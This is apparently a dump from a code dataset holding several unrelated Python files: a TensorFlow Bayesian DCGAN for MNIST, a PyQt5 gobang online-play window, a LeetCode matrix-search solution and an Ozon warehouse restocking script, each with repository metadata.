[ks];\r\n\r\n for layer in range(len(d_strides)):\r\n assert d_strides[layer]<=2, \"Invalid Stride\";\r\n assert ks % 2 == 1, \"Invalid Kernel Size\";\r\n\r\n self.D_weight_dims[\"d_h\"+str(layer)+\"_W\"] = (ks, ks, num_dfs[layer], num_dfs[layer+1]);\r\n self.D_weight_dims[\"d_h\"+str(layer)+\"_b\"] = (num_dfs[layer+1],);\r\n d_h, d_w = conv_out_size(d_h, d_strides[layer]), conv_out_size(d_w, d_strides[layer]);\r\n ks = kernel_sizer(ks, d_strides[layer]);\r\n self.D_kernel_sizes.append(ks);\r\n\r\n self.D_weight_dims.update(OrderedDict([(\"d_h_end_lin_W\", (num_dfs[-1] * d_h * d_w, num_dfs[-1])),\r\n (\"d_h_end_lin_b\", (num_dfs[-1],)),\r\n (\"d_h_out_lin_W\", (num_dfs[-1], self.K)),\r\n (\"d_h_out_lin_b\", (self.K,))]))\r\n\r\n def Discriminator(self, image, K, d_params, train=True):\r\n \"\"\"\r\n Image\r\n => (Convolution => Batch Norm => Leaky ReLU)\r\n => (Convolution => Batch Norm => Leaky ReLU)\r\n => ......\r\n => Full connected => Leaky ReLU : h_end\r\n => Full connected : h_out = logit\r\n => output : softmax(h_out) = prob\r\n :param image: image data\r\n 
:param K: output size of D (unsupervised : 2)\r\n :param d_params: Discriminator parameters for training/evaluation\r\n :param train: True for train(update the params) (why? Batch norm)\r\n :return: softmax(h_out), h_out, [h_end]\r\n \"\"\"\r\n\r\n with tf.variable_scope(\"discriminator\",reuse=tf.AUTO_REUSE) as scope:\r\n\r\n h = image;\r\n\r\n\r\n for layer in range(len(self.D_strides)):\r\n\r\n # self.D_weight_dims[layer_W] : (kernel_h, kernel_w, features in layer+1, features in layer)\r\n if layer == 0:\r\n h = tf.nn.leaky_relu(conv2d(h,\r\n self.D_weight_dims[\"d_h\" + str(layer) + \"_W\"][-1],\r\n name=\"d_h\" + str(layer) + \"_conv\",\r\n k_h=self.D_kernel_sizes[layer],\r\n k_w=self.D_kernel_sizes[layer],\r\n d_h=self.D_strides[layer],\r\n d_w=self.D_strides[layer],\r\n w=d_params[\"d_h\" + str(layer) + \"_W\"],\r\n biases=d_params[\"d_h\" + str(layer) + \"_b\"]));\r\n else:\r\n h = tf.nn.leaky_relu(self.D_batch_norm[\"d_bn\"+str(layer)](\r\n conv2d(h,\r\n self.D_weight_dims[\"d_h\" + str(layer) + \"_W\"][-1],\r\n name=\"d_h\" + str(layer) + \"_conv\",\r\n k_h=self.D_kernel_sizes[layer],\r\n k_w=self.D_kernel_sizes[layer],\r\n d_h=self.D_strides[layer],\r\n d_w=self.D_strides[layer],\r\n w=d_params[\"d_h\" + str(layer) + \"_W\"],\r\n biases=d_params[\"d_h\" + str(layer) + \"_b\"]),train=train));\r\n\r\n\r\n h_end = tf.nn.leaky_relu(linear(input_=tf.reshape(h, [self.batch_size, -1]),\r\n output_size=self.d_filter*4,\r\n scope=\"d_h_end_lin\",\r\n matrix=d_params.d_h_end_lin_W,\r\n bias=d_params.d_h_end_lin_b));\r\n h_out = linear(input_=h_end, output_size=K,\r\n scope=\"d_h_out_lin\",\r\n matrix=d_params.d_h_out_lin_W, bias=d_params.d_h_out_lin_b);\r\n\r\n return tf.nn.softmax(h_out), h_out, [h_end];\r\n\r\n def Generator(self, z, g_params):\r\n \"\"\"\r\n Noise\r\n => Full connected\r\n => (Transpose Convolution => Batch norm => ReLU)\r\n => (Transpose Convolution => Batch norm => ReLU)\r\n => ......\r\n => Transpose Convolution\r\n => tanh(h)\r\n :param z: input noise\r\n :param g_params: Generator parameters for training/evaluation\r\n :return: generated image\r\n \"\"\"\r\n\r\n with tf.variable_scope(\"generator\",reuse=tf.AUTO_REUSE) as scope:\r\n h = linear(input_=z, output_size=self.G_weight_dims[\"g_h0_lin_W\"][-1],\r\n scope=\"g_h0_lin\", matrix=g_params.g_h0_lin_W, bias=g_params.g_h0_lin_b);\r\n h = tf.nn.relu(self.G_batch_norm.g_bn0(h));\r\n\r\n h = tf.reshape(h, [self.batch_size, self.G_output_dims[\"g_h0_out\"][0],\r\n self.G_output_dims[\"g_h0_out\"][1], -1]);\r\n\r\n for layer in range(1, len(self.G_strides)+1):\r\n # self.G_weight_dims[layer_W] : (kernel_h, kernel_w, features in layer+1, features in layer)\r\n # self.G_output_dims[layer] : (output_h, output_w)\r\n # out_shape = [batch, output_h, output_w, features in next layer]\r\n out_shape = [self.batch_size, self.G_output_dims[\"g_h\"+str(layer)+\"_out\"][0],\r\n self.G_output_dims[\"g_h\" + str(layer) + \"_out\"][1],\r\n self.G_weight_dims[\"g_h\"+str(layer)+\"_W\"][-2]];\r\n\r\n h = deconv2d(input_=h,\r\n output_shape=out_shape,\r\n k_h=self.G_kernel_sizes[layer-1], k_w=self.G_kernel_sizes[layer-1],\r\n d_h=self.G_strides[layer-1], d_w=self.G_strides[layer-1],\r\n name=\"g_h\"+str(layer),\r\n w=g_params[\"g_h\"+str(layer)+\"_W\"],\r\n biases=g_params[\"g_h\"+str(layer)+\"_b\"]);\r\n\r\n if layer < len(self.G_strides):\r\n h = tf.nn.relu(self.G_batch_norm[\"g_bn\"+str(layer)](h));\r\n\r\n\r\n return tf.nn.tanh(h);\r\n\r\n\r\n def _get_optimizer(self, lr):\r\n if self.optimizer == 'adam':\r\n return 
tf.train.AdamOptimizer(learning_rate=lr, beta1=0.5);\r\n elif self.optimizer =='sgd':\r\n return tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.5);\r\n else:\r\n raise ValueError(\"Optimizer must be either 'adam' or 'sgd'\");\r\n\r\n\r\n def initialize_weights(self, scope_str):\r\n \"\"\" Initialize the weights with normal distribution\r\n To use SGHMC algorithm, there are (# MC samples)*(# SGHMC samples) set of\r\n parameters in G/D\r\n :param scope_str: 'generator' or 'discriminator'\r\n :return: parameters list\r\n \"\"\"\r\n\r\n if scope_str == \"generator\":\r\n weight_dims = self.G_weight_dims;\r\n numz = self.num_G\r\n elif scope_str == \"discriminator\":\r\n weight_dims = self.D_weight_dims;\r\n numz = self.num_D\r\n else:\r\n raise RuntimeError(\"invalid scope! : 'generator' or 'discriminator' \");\r\n\r\n param_list = [];\r\n\r\n with tf.variable_scope(scope_str,reuse=tf.AUTO_REUSE) as scope:\r\n # numz : MC samples\r\n for i in range(numz):\r\n # num_mcmc : SGHMC samples\r\n for m in range(self.num_mcmc):\r\n wgts = AttributeDict();\r\n for name, shape in weight_dims.items():\r\n wgts[name] = tf.get_variable(\"%s_%04d_%04d\" %(name, i, m),\r\n shape,\r\n initializer=tf.random_normal_initializer(stddev=0.02));\r\n param_list.append(wgts);\r\n\r\n return param_list;\r\n\r\n def build_graph(self):\r\n \"\"\"\r\n Make BDCGAN graph\r\n \"\"\"\r\n\r\n \"\"\" Make input placeholders for D and G\"\"\"\r\n self.inputs = tf.placeholder(tf.float32,\r\n [self.batch_size] + self.x_dim,\r\n name=\"real_images\");\r\n\r\n self.z = tf.placeholder(tf.float32,\r\n [self.batch_size, self.z_dim, self.num_G], name=\"z\");\r\n self.z_sampler = tf.placeholder(tf.float32,\r\n [self.batch_size, self.z_dim], name=\"z_sampler\");\r\n\r\n \"\"\" Initialize Generator/Discriminator weights \"\"\"\r\n self.G_param_list = self.initialize_weights(\"generator\");\r\n self.D_param_list = self.initialize_weights(\"discriminator\");\r\n\r\n \"\"\" Algorithm 1 : Second Iteration - Update params in D's\r\n - 1) Make a list of variables of all D's to train\r\n - 2) Make a list of learning rate \r\n \"\"\"\r\n self.D_learning_rate = tf.placeholder(tf.float32, shape=[]);\r\n\r\n train_vars = tf.trainable_variables();\r\n self.D_vars = [];\r\n\r\n for i in range(self.num_D):\r\n for m in range(self.num_mcmc):\r\n self.D_vars.append(\r\n [var for var in train_vars if 'd_' in var.name and \"_%04d_%04d\" % (i, m) in var.name]);\r\n\r\n\r\n\r\n \"\"\" Algorithm 1 : Second Iteration - Update params in D's\r\n - Make d_losses and optimizers\r\n \"\"\"\r\n\r\n self.d_losses, self.d_train_ops, self.d_train_ops_adam = [], [], [];\r\n\r\n\r\n for di, d_params in enumerate(self.D_param_list):\r\n d_probs, d_logits, _ = self.Discriminator(self.inputs, self.K, d_params);\r\n\r\n\r\n # const_label[:, 1] = 1.0 <= data sampled from the real distribution\r\n const_labels = np.zeros((self.batch_size, self.K));\r\n const_labels[:, 1] = 1.0;\r\n\r\n # d_loss_real : same for DCGAN\r\n d_loss_real = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\r\n logits=d_logits, labels=tf.constant(const_labels)\r\n ));\r\n\r\n\r\n d_loss_fakes = [];\r\n \"\"\" Algorithm 1 : Second Iteration \r\n - sum_{i,k} p(theta_d|z^{(i)}, theta_d^{k,m})\r\n \"\"\"\r\n for gi, g_params in enumerate(self.G_param_list):\r\n # D(G(z))\r\n d_probs, d_logits, _ = self.Discriminator(self.Generator(self.z[:, :, gi % self.num_G], g_params),\r\n self.K, d_params);\r\n # const_label[:, 0]=0.0 <= data sample from the fake distribution\r\n const_labels = 
np.zeros((self.batch_size, self.K));\r\n const_labels[:, 0] = 1.0;\r\n\r\n # d_fake_loss_ : same for DCGAN\r\n # : there are J_G*num_MCMC(total number of G) d_fake_loss for each discriminator\r\n d_loss_fake_ = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\r\n logits=d_logits, labels=tf.constant(const_labels)\r\n ));\r\n\r\n d_loss_fakes.append(d_loss_fake_);\r\n\r\n\r\n d_losses = [];\r\n for d_loss_fake_ in d_loss_fakes:\r\n # d_loss = d_real + d_loss in DCGAN\r\n # there is only one d_loss_real\r\n # there are num_G d_loss_fake\r\n # => d_loss_real*float(self.num_G)\r\n d_loss_ = d_loss_real*float(self.num_G) + d_loss_fake_;\r\n\r\n\r\n if not self.DCGAN:\r\n # SGHMC part : Add prior and noise\r\n d_loss_ += self.D_prior(d_params) + self.D_noise(d_params);\r\n\r\n d_losses.append(tf.reshape(d_loss_, [1]));\r\n\r\n \"\"\"\r\n tf.reduce_logsumexp(input_tensor, axis)\r\n : log(sum(exp(elements across dimensions of a tensor)))\r\n \"\"\"\r\n d_loss = tf.reduce_logsumexp(tf.concat(d_losses, 0));\r\n\r\n self.d_losses.append(d_loss);\r\n\r\n d_optimizer = self._get_optimizer(self.D_learning_rate);\r\n self.d_train_ops.append(\r\n d_optimizer.minimize(d_loss, var_list=self.D_vars[di]));\r\n d_optimizer_adam = tf.train.AdamOptimizer(learning_rate=self.D_learning_rate,\r\n beta1=0.5);\r\n self.d_train_ops_adam.append(\r\n d_optimizer_adam.minimize(d_loss, var_list=self.D_vars[di]));\r\n\r\n\r\n \"\"\" REPEAT THE CODE for Algorithm 1 : Second Iteration w.r.t G\"\"\"\r\n \"\"\" Algorithm 1 : First Iteration - Update params in G's\r\n - 1) Make a list of variables of all G's to train\r\n - 2) Make a list of learning rate \r\n \"\"\"\r\n self.G_learning_rate = tf.placeholder(tf.float32, shape=[]);\r\n self.G_vars = [];\r\n\r\n for i in range(self.num_G):\r\n for m in range(self.num_mcmc):\r\n self.G_vars.append(\r\n [var for var in train_vars if 'g_' in var.name and \"_%04d_%04d\" % (i, m) in var.name]);\r\n\r\n \"\"\" Algorithm 1 : First Iteration - Update params in G's\r\n - Make g_losses and optimizers\r\n \"\"\"\r\n self.g_losses, self.g_train_ops, self.g_train_ops_adam = [], [], [];\r\n\r\n for gi, g_params in enumerate(self.G_param_list):\r\n gi_losses = [];\r\n\r\n for d_params in self.D_param_list:\r\n # D(G(z))\r\n d_prob, d_logit, d_feature_fake = self.Discriminator(\r\n self.Generator(self.z[:, :, gi % self.num_G], g_params),\r\n self.K, d_params\r\n );\r\n _, _, d_feature_real = self.Discriminator(self.inputs, self.K, d_params);\r\n\r\n # const_label[:, 1] = 1.0 <= data sampled from the real distribution\r\n const_labels = np.zeros((self.batch_size, self.K));\r\n const_labels[:, 1] = 1.0;\r\n\r\n # g_loss_ : classic loss\r\n g_loss_ = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\r\n logits=d_logit, labels=tf.constant(const_labels)\r\n ));\r\n\r\n g_loss_ += tf.reduce_mean(\r\n huber_loss(d_feature_real[-1], d_feature_fake[-1]));\r\n\r\n if not self.DCGAN:\r\n # SGHMC part : Add prior and noise\r\n g_loss_ += self.G_prior(g_params) + self.G_noise(g_params);\r\n\r\n gi_losses.append(tf.reshape(g_loss_, [1]));\r\n\r\n \"\"\"\r\n tf.reduce_logsumexp(input_tensor, axis)\r\n : log(sum(exp(elements across dimensions of a tensor)))\r\n \"\"\"\r\n g_loss = tf.reduce_logsumexp(tf.concat(gi_losses, 0));\r\n self.g_losses.append(g_loss);\r\n\r\n g_optimizer = self._get_optimizer(self.G_learning_rate);\r\n self.g_train_ops.append(\r\n g_optimizer.minimize(g_loss, var_list=self.G_vars[gi]));\r\n\r\n g_optimizer_adam = tf.train.AdamOptimizer(learning_rate=self.G_learning_rate,\r\n 
beta1=0.5);\r\n self.g_train_ops_adam.append(\r\n g_optimizer_adam.minimize(g_loss, var_list=self.G_vars[gi]));\r\n\r\n\r\n\r\n\r\n \"\"\" Make samplers \"\"\"\r\n self.G_sampler = [];\r\n\r\n for gi, g_params in enumerate(self.G_param_list):\r\n self.G_sampler.append(self.Generator(self.z_sampler, g_params));\r\n\r\n \"\"\" For g_loss and d_loss (Bayesian)\"\"\"\r\n\r\n def G_prior(self, g_params):\r\n \"\"\"\r\n Let W be a weight parameter in g_params\r\n W_normal = W/prior_std (element wise)\r\n loss_W = average sum of square of entries of W_normal\r\n\r\n prior_loss = sum of loss_W along W : params in g_params\r\n\r\n \"\"\"\r\n with tf.variable_scope(\"generator\",reuse=tf.AUTO_REUSE) as scope:\r\n prior_loss = 0.0;\r\n for var in g_params.values():\r\n nn = tf.divide(var, self.prior_std);\r\n prior_loss += tf.reduce_mean(tf.multiply(nn, nn));\r\n\r\n prior_loss /= self.dataset_size;\r\n\r\n return prior_loss;\r\n\r\n def G_noise(self, g_params):\r\n \"\"\"\r\n A noise for SGHMC\r\n : noise is sampled from N(0, self.noise_std)\r\n where self.noise_std = np.sqrt(2 * self.alpha * self.eta) (in Algorithm 1)\r\n\r\n To use gradient descent,\r\n define noise_loss = W*noise where W is a parameter in g_params\r\n \"\"\"\r\n with tf.variable_scope(\"generator\",reuse=tf.AUTO_REUSE) as scope:\r\n noise_loss = 0.0;\r\n\r\n for name, var in g_params.items():\r\n # noise_ ~ N(0, noise_std*shape of var)\r\n # noise_.sample() : a single sample from the noise\r\n noise_ = tf.contrib.distributions.Normal(loc=0., scale=self.noise_std*tf.ones(var.get_shape()));\r\n noise_loss += tf.reduce_mean(var*noise_.sample());\r\n\r\n noise_loss /= self.dataset_size;\r\n return noise_loss;\r\n\r\n def D_prior(self, d_params):\r\n with tf.variable_scope(\"discriminator\",reuse=tf.AUTO_REUSE) as scope:\r\n prior_loss = 0.0;\r\n for var in d_params.values():\r\n nn = tf.divide(var, self.prior_std);\r\n prior_loss += tf.reduce_mean(tf.multiply(nn, nn));\r\n\r\n prior_loss /= self.dataset_size;\r\n\r\n return prior_loss;\r\n\r\n def D_noise(self, d_params):\r\n \"\"\"\r\n A noise for SGHMC\r\n : noise is sampled from N(0, self.noise_std)\r\n where self.noise_std = np.sqrt(2 * self.alpha * self.eta) (in Algorithm 1)\r\n\r\n To use gradient descent,\r\n define noise_loss = W*noise where W is a parameter in g_params\r\n \"\"\"\r\n with tf.variable_scope(\"discriminator\",reuse=tf.AUTO_REUSE) as scope:\r\n noise_loss = 0.0;\r\n\r\n for name, var in d_params.items():\r\n # noise_ ~ N(0, noise_std*shape of var)\r\n # noise_.sample() : a single sample from the noise\r\n noise_ = tf.contrib.distributions.Normal(loc=0., scale=self.noise_std * tf.ones(var.get_shape()));\r\n noise_loss += tf.reduce_mean(var * noise_.sample());\r\n\r\n noise_loss /= self.dataset_size;\r\n return noise_loss;\r\n\r\n \"\"\" Information for the Network \"\"\"\r\n def print_Weight_info(self):\r\n print(\"===============================================================\")\r\n print(\" Generator \");\r\n print(\" 1. Weight dims\");\r\n for k, v in self.G_weight_dims.items():\r\n print(\"{} : \".format(k), end=\" \");\r\n print(v);\r\n print(\" 2. kernel size \");\r\n print(self.G_kernel_sizes);\r\n\r\n print(\" 3. output dims \");\r\n for k, v in self.G_output_dims.items():\r\n print(\"{} : \".format(k), end=\" \");\r\n print(v);\r\n\r\n print(\" 4. num_gfs \");\r\n print(self.num_g_features)\r\n print(\"===============================================================\")\r\n print(\" Discriminator\");\r\n print(\" 1. 
Weight dims\");\r\n for k, v in self.D_weight_dims.items():\r\n print(\"{} : \".format(k), end=\" \");\r\n print(v);\r\n print(\" 2. kernel size \");\r\n print(self.D_kernel_sizes);\r\n\r\n print(\" 3. num_dfs\")\r\n print(self.num_d_features);\r\n print(\"===============================================================\")\r\n\r\n\r\n\r\n\r\n\r\ndef get_session_MNIST():\r\n if tf.get_default_session() is None:\r\n print(\"Create new session\");\r\n tf.reset_default_graph();\r\n _SESSION = tf.InteractiveSession();\r\n else:\r\n print(\"Use old session\");\r\n _SESSION = tf.get_default_session();\r\n\r\n return _SESSION;\r\n\r\n\r\n\r\ndef BGAN_example_MNIST():\r\n \"\"\" Set the path to save the result\"\"\"\r\n data = \"/MNIST/\";\r\n path = \"./GAN/BDCGAN/\" + data;\r\n model_path = path + \"model/\";\r\n fig_path = path + \"image/\";\r\n\r\n if not os.path.exists(model_path):\r\n os.makedirs(model_path);\r\n\r\n if not os.path.exists(fig_path):\r\n os.makedirs(fig_path);\r\n\r\n z_dim = 100;\r\n g_filters = 64;\r\n d_filters = 96;\r\n batch_size = 64;\r\n num_layer = 4;\r\n J = 10; # number of samples of z/generators\r\n J_d = 1; # number of discriminator weight samples\r\n num_mcmc = 2;\r\n\r\n\r\n\r\n train_iter = 75000;\r\n base_lr = 0.005;\r\n lr_decay = 3.0;\r\n optimizer = 'sgd'\r\n\r\n n_save = 100;\r\n\r\n dataset = MNIST();\r\n x_dim = dataset.x_dim;\r\n datasize = dataset.dataset_size;\r\n\r\n random_seed = 2222;\r\n\r\n session = get_session_MNIST();\r\n tf.set_random_seed(random_seed);\r\n\r\n dcgan = BDCGAN(x_dim=x_dim, z_dim=z_dim,\r\n batch_size=batch_size,dataset_size=datasize,\r\n g_filter=g_filters, d_filter=d_filters,\r\n J=J, J_d=J_d, M=num_mcmc, num_layer=num_layer,\r\n lr=base_lr, optimizer=optimizer);\r\n\r\n print(\"BDCGAN : \");\r\n dcgan.print_Weight_info();\r\n\r\n print(\"Start session\");\r\n session.run(tf.global_variables_initializer());\r\n\r\n optimizer_dict = {\"D\":dcgan.d_train_ops_adam,\r\n \"G\":dcgan.g_train_ops_adam};\r\n\r\n num_D = J_d;\r\n saver = tf.train.Saver();\r\n\r\n for itr in range(train_iter):\r\n\r\n if itr == 5000:\r\n print(\"Switching to user-specified optimizer\");\r\n optimizer_dict = {\"D\":dcgan.d_train_ops,\r\n \"G\":dcgan.g_train_ops};\r\n\r\n learning_rate = base_lr*np.exp(-lr_decay*min(1.0, (itr*batch_size)/float(datasize)));\r\n\r\n image_batch, _ = dataset.next_batch(batch_size, class_id=None);\r\n\r\n # Compute d_loss\r\n batch_z = np.random.uniform(-1, 1, [batch_size, z_dim, dcgan.num_G]);\r\n d_info = session.run(optimizer_dict[\"D\"] + dcgan.d_losses,\r\n feed_dict={dcgan.inputs: image_batch,\r\n dcgan.z: batch_z,\r\n dcgan.D_learning_rate: learning_rate});\r\n\r\n d_losses = d_info[num_D:num_D*2];\r\n\r\n # Compute g_loss\r\n batch_z = np.random.uniform(-1, 1, [batch_size, z_dim, dcgan.num_G]);\r\n g_info = session.run(optimizer_dict[\"G\"] + dcgan.g_losses,\r\n feed_dict={dcgan.z: batch_z,\r\n dcgan.inputs: image_batch,\r\n dcgan.G_learning_rate: learning_rate});\r\n g_losses = [g_ for g_ in g_info if g_ is not None];\r\n\r\n\r\n if itr > 0 and itr % n_save == 0:\r\n print(\"Iteration: {}\".format(itr));\r\n print(\"D loss : \");\r\n print(d_losses);\r\n print(\"G loss : \");\r\n print(g_losses);\r\n\r\n # results = {\"d_losses\": map(float, d_losses),\r\n # \"g_losses\": map(float, g_losses),\r\n # \"timestamp\": time.time()};\r\n\r\n saver.save(session, model_path+\"model_\" + str(itr) + \".ckpt\");\r\n\r\n for zi in range(dcgan.num_G):\r\n _imgs, _ps = [], [];\r\n\r\n for _ in range(10):\r\n z_sampler = 
np.random.uniform(-1, 1, size=(batch_size, z_dim));\r\n sampled_imgs = session.run(dcgan.G_sampler[zi*dcgan.num_mcmc],\r\n feed_dict={dcgan.z_sampler: z_sampler});\r\n _imgs.append(sampled_imgs);\r\n\r\n sampled_imgs = np.concatenate(_imgs);\r\n print_images(sampled_imgs,\r\n \"BDCGAN_%i_%.2f\" % (zi, g_losses[zi * dcgan.num_mcmc]),\r\n itr, fig_path);\r\n\r\n print_images(image_batch, \"RAW\", itr, fig_path);\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"My DCGAN\");\r\n X = BDCGAN([28, 28, 1], 128, 60000, 64, g_filter=64, d_filter=96);\r\n # #X = BDCGAN([28, 28, 1], 128, 60000, 64, g_filter=64, d_filter=64);\r\n X.print_Weight_info();\r\n #BGAN_example_MNIST()\r\n","repo_name":"yoonjeong-choi-dev/study-history","sub_path":"AI/BayesianGAN/myBDCGAN.py","file_name":"myBDCGAN.py","file_ext":"py","file_size_in_byte":45221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"42278597278","text":"'''\nFunction:\n 定义联机对战\nAuthor:\n Charles\n微信公众号:\n Charles的皮卡丘\n'''\nimport sys\nimport random\nfrom .server import *\nfrom .client import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\n\n'''联机对战'''\nclass PlayOnlineUI(QWidget):\n def __init__(self, cfg, home_ui, parent=None, **kwargs):\n super(PlayOnlineUI, self).__init__(parent)\n self.cfg = cfg\n self.home_ui = home_ui\n self.setWindowTitle('联机对战')\n self.setWindowIcon(QIcon(cfg.ICON_FILEPATH))\n self.setFixedSize(300, 200)\n # 昵称\n self.nickname = random.choice(['杰尼龟', '皮卡丘', '小火龙', '小锯鳄', '妙蛙种子', '菊草叶'])\n self.layout0 = QHBoxLayout()\n self.nickname_label = QLabel('游戏昵称:', self)\n self.nickname_edit = QLineEdit(self)\n self.nickname_edit.setText(self.nickname)\n self.layout0.addWidget(self.nickname_label, 1)\n self.layout0.addWidget(self.nickname_edit, 3)\n # IP\n self.target_ip = '127.0.0.1'\n self.layout1 = QHBoxLayout()\n self.ip_label = QLabel('对方IP:', self)\n self.ip_edit = QLineEdit(self)\n self.ip_edit.setText(self.target_ip)\n self.layout1.addWidget(self.ip_label, 1)\n self.layout1.addWidget(self.ip_edit, 3)\n # 按钮\n self.layout2 = QHBoxLayout()\n self.connect_button = QPushButton('作为客户端', self)\n self.connect_button.clicked.connect(self.becomeClient)\n self.ashost_button = QPushButton('作为服务器', self)\n self.ashost_button.clicked.connect(self.becomeHost)\n self.layout2.addWidget(self.connect_button)\n self.layout2.addWidget(self.ashost_button)\n # 布局\n self.layout = QVBoxLayout()\n self.layout.addLayout(self.layout0)\n self.layout.addLayout(self.layout1)\n self.layout.addLayout(self.layout2)\n self.setLayout(self.layout)\n '''作为客户端'''\n def becomeClient(self):\n self.close()\n self.nickname = self.nickname_edit.text()\n self.target_ip = self.ip_edit.text()\n self.client_ui = GobangClient(cfg=self.cfg, nickname=self.nickname, server_ip=self.target_ip)\n self.client_ui.exit_signal.connect(lambda: sys.exit())\n self.client_ui.back_signal.connect(self.home_ui.show)\n self.client_ui.show()\n '''作为服务器'''\n def becomeHost(self):\n self.close()\n self.nickname = self.nickname_edit.text()\n self.server_ui = GobangSever(cfg=self.cfg, nickname=self.nickname)\n self.server_ui.exit_signal.connect(lambda: sys.exit())\n self.server_ui.back_signal.connect(self.home_ui.show)\n 
self.server_ui.show()","repo_name":"CharlesPikachu/Games","sub_path":"cpgames/core/games/gobang/modules/online/playonline.py","file_name":"playonline.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":4711,"dataset":"github-code","pt":"68"} +{"seq_id":"5803009663","text":"'''\nWrite an efficient algorithm that searches for a value target in an m x n integer matrix matrix. This matrix has the following properties:\n\n    Integers in each row are sorted from left to right.\n    The first integer of each row is greater than the last integer of the previous row.\n\nConstraints:\n    m == matrix.length\n    n == matrix[i].length\n    1 <= m, n <= 100\n    -10^4 <= matrix[i][j], target <= 10^4\n'''\n\nclass Solution:\n    def searchMatrix(self, matrix: list[list[int]], target: int) -> bool:\n        for row in matrix:\n            if target >= row[0] and target <= row[-1]:\n                return target in row\n        return False\n\n# Tests\nsoln = Solution()\nprint(soln.searchMatrix([[1,3,5,7],[10,11,16,20],[23,30,34,60]], 3)) # True\nprint(soln.searchMatrix([[1,3,5,7],[10,11,16,20],[23,30,34,60]], 13)) # False\n\n# Runtime: 67ms\n# Memory: 14.3 MB","repo_name":"salsinan/algorithms","sub_path":"Python/search_matrix.py","file_name":"search_matrix.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18152153985","text":"from typing import TypeVar\n\nimport pandas as pd\nimport numpy as np\nimport arrow\nfrom pydantic import BaseModel, Field\n\nfrom data.ozon_methods import get_warehouses_data, get_orders_data\n\n\nPandasDataFrame = TypeVar('pandas.core.frame.DataFrame')\n\n\nclass StatWarehouse(BaseModel):\n    data_ekb: PandasDataFrame = Field(title=\"prepare_ekb\")\n    data_msk: PandasDataFrame = Field(title=\"prepare_msk\")\n\n\nekb_wh_name = \"ЕКАТЕРИНБУРГ\"\nmsk_wh_name = \"ХОРУГВИНО\"\ndict_optimal_wh_value = {ekb_wh_name: 3, msk_wh_name: 5}\nkoeff_dict = {1: 1.3, 2: 1.3, 3: 1.3, 4: 1.2, 5: 1.1, 6: 1.1, 7: 1.1, 8: 1.1, 9: 1.2, 10: 1.3, 11: 1.4, 12: 1.4}\n\n\ndef filter_orders(df, warehouse, count_months=1, status_filter=('cancelled',)):\n    data_filter = int(arrow.utcnow().shift(months=-count_months).timestamp())\n    return df[\n        (df.order_datetime > data_filter) & ~df.status.isin(status_filter) & df.warehouse.str.contains(warehouse)\n    ].reset_index(drop=True)\n\n\ndef filter_wh(df, warehouse):\n    return df[df.warehouse_name.str.contains(warehouse)].reset_index(drop=True)\n\n\ndef get_stat_by_wh(orders_df, wh_df, warehouse_name):\n    orders_wh = filter_orders(orders_df, warehouse_name).groupby(\n        ['name', 'artikul']\n    )[['quantity']].agg('sum').reset_index()\n\n    orders_wh.columns = ['name', 'artikul', 'saled']\n    wh_by_name = filter_wh(wh_df, warehouse_name)\n    wh_by_name.columns = ['warehouse_name', 'name', 'artikul', 'in_ozon']\n    df = pd.merge(orders_wh, wh_by_name, on=\"artikul\", how=\"outer\").sort_values(\"artikul\")\n    df.name_y.fillna(df.name_x, inplace=True)\n    df['optimal'] = float(dict_optimal_wh_value[warehouse_name])\n    df = df[['warehouse_name', 'artikul', 'name_y', 'optimal', 'in_ozon', 'saled']].fillna(0).reset_index(drop=True)\n    df.columns = ['warehouse_name', 'artikul', 'name', 'optimal', 'in_ozon', 'saled']\n    df.warehouse_name = warehouse_name\n    return df.fillna(0)\n\n\ndef prepare_to_buy(df, number_month: int = 5):\n    koeff = koeff_dict[number_month]\n    df['to_buy'] = 0.0\n    df['after_delivery'] = 0.0\n\n    df.to_buy = ((df.saled * koeff).apply(np.ceil) - df.in_ozon).clip(lower=0.0)\n    df.after_delivery = 
df.in_ozon + df.to_buy\n\n    df.loc[df.after_delivery < df.optimal, 'to_buy'] = (df.optimal - df.after_delivery + df.to_buy).clip(lower=0.0)\n    df.loc[df.after_delivery < df.saled, 'to_buy'] = (df.saled * koeff - df.in_ozon).clip(lower=0.0)\n    df.drop(columns=[\"after_delivery\"], inplace=True)\n    return df\n\n\ndef get_prepared_data(df_orders, df_wh, wh_name):\n    stat = get_stat_by_wh(df_orders, df_wh, wh_name)\n    return prepare_to_buy(stat, arrow.now().month)\n\n\ndef get_data_by_warehouse() -> StatWarehouse:\n    wh_data = get_warehouses_data()\n    orders = get_orders_data()\n\n    df_wh = pd.DataFrame([s.__dict__ for s in wh_data])\n    df_wh.warehouse_name = df_wh.warehouse_name.str.upper()\n\n    df_orders = pd.DataFrame([s.__dict__ for s in orders])\n    df_orders['order_datetime'] = df_orders['order_datetime'].astype('datetime64[ns]')\n    df_orders['order_datetime'] = (df_orders['order_datetime'] - pd.Timestamp(0)) // pd.Timedelta('1s')\n\n    data_ekb = get_prepared_data(df_orders, df_wh, ekb_wh_name)\n    data_msk = get_prepared_data(df_orders, df_wh, msk_wh_name)\n\n    return StatWarehouse(data_ekb=data_ekb, data_msk=data_msk)\n\n\nif __name__ == '__main__':\n    import warnings\n    with warnings.catch_warnings(record=True):\n        data = get_data_by_warehouse()\n        data.data_ekb.to_excel('prepare_ekb.xlsx', index=False)\n        data.data_msk.to_excel('prepare_msk.xlsx', index=False)\n","repo_name":"Evgen4567/tg_eware","sub_path":"app/data/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25486726816","text":"import pandas as pd\nimport collections\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as 